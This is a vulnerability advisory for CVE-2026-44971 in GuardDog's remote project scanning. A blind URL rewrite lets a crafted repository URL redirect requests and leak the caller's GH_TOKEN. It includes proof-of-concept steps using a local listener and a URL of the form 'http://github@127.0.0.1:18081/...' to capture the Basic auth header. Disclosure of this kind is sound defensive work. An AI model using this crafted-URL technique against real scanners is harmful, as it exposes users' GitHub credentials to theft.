CVE-2026-44971: GuardDog has a blind GitHub URL rewrite in remote project scanning causes SSRF and `GH_TOKEN` exfiltration

May 11, 2026 (updated June 8, 2026)

The programmatic remote project scanning path rewrites attacker-controlled repository URLs using a blind string replacement and then sends the caller’s GitHub credentials with the resulting request. This allows an attacker who can influence the scanned repository URL to trigger SSRF and capture the GH_TOKEN used by GuardDog.

Start an HTTP listener on 127.0.0.1:18081 that logs the request path and Authorization header.
Set GIT_USERNAME=alice and GH_TOKEN=supersecret.
Call PypiRequirementsScanner().scan_remote("http://github@127.0.0.1:18081/owner/repo", "main", "requirements.txt").
Observe a request to /owner/repo/main/requirements.txt with Authorization: Basic YWxpY2U6c3VwZXJzZWNyZXQ=.

References

Code Behaviors & Features

Detect and mitigate CVE-2026-44971 with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →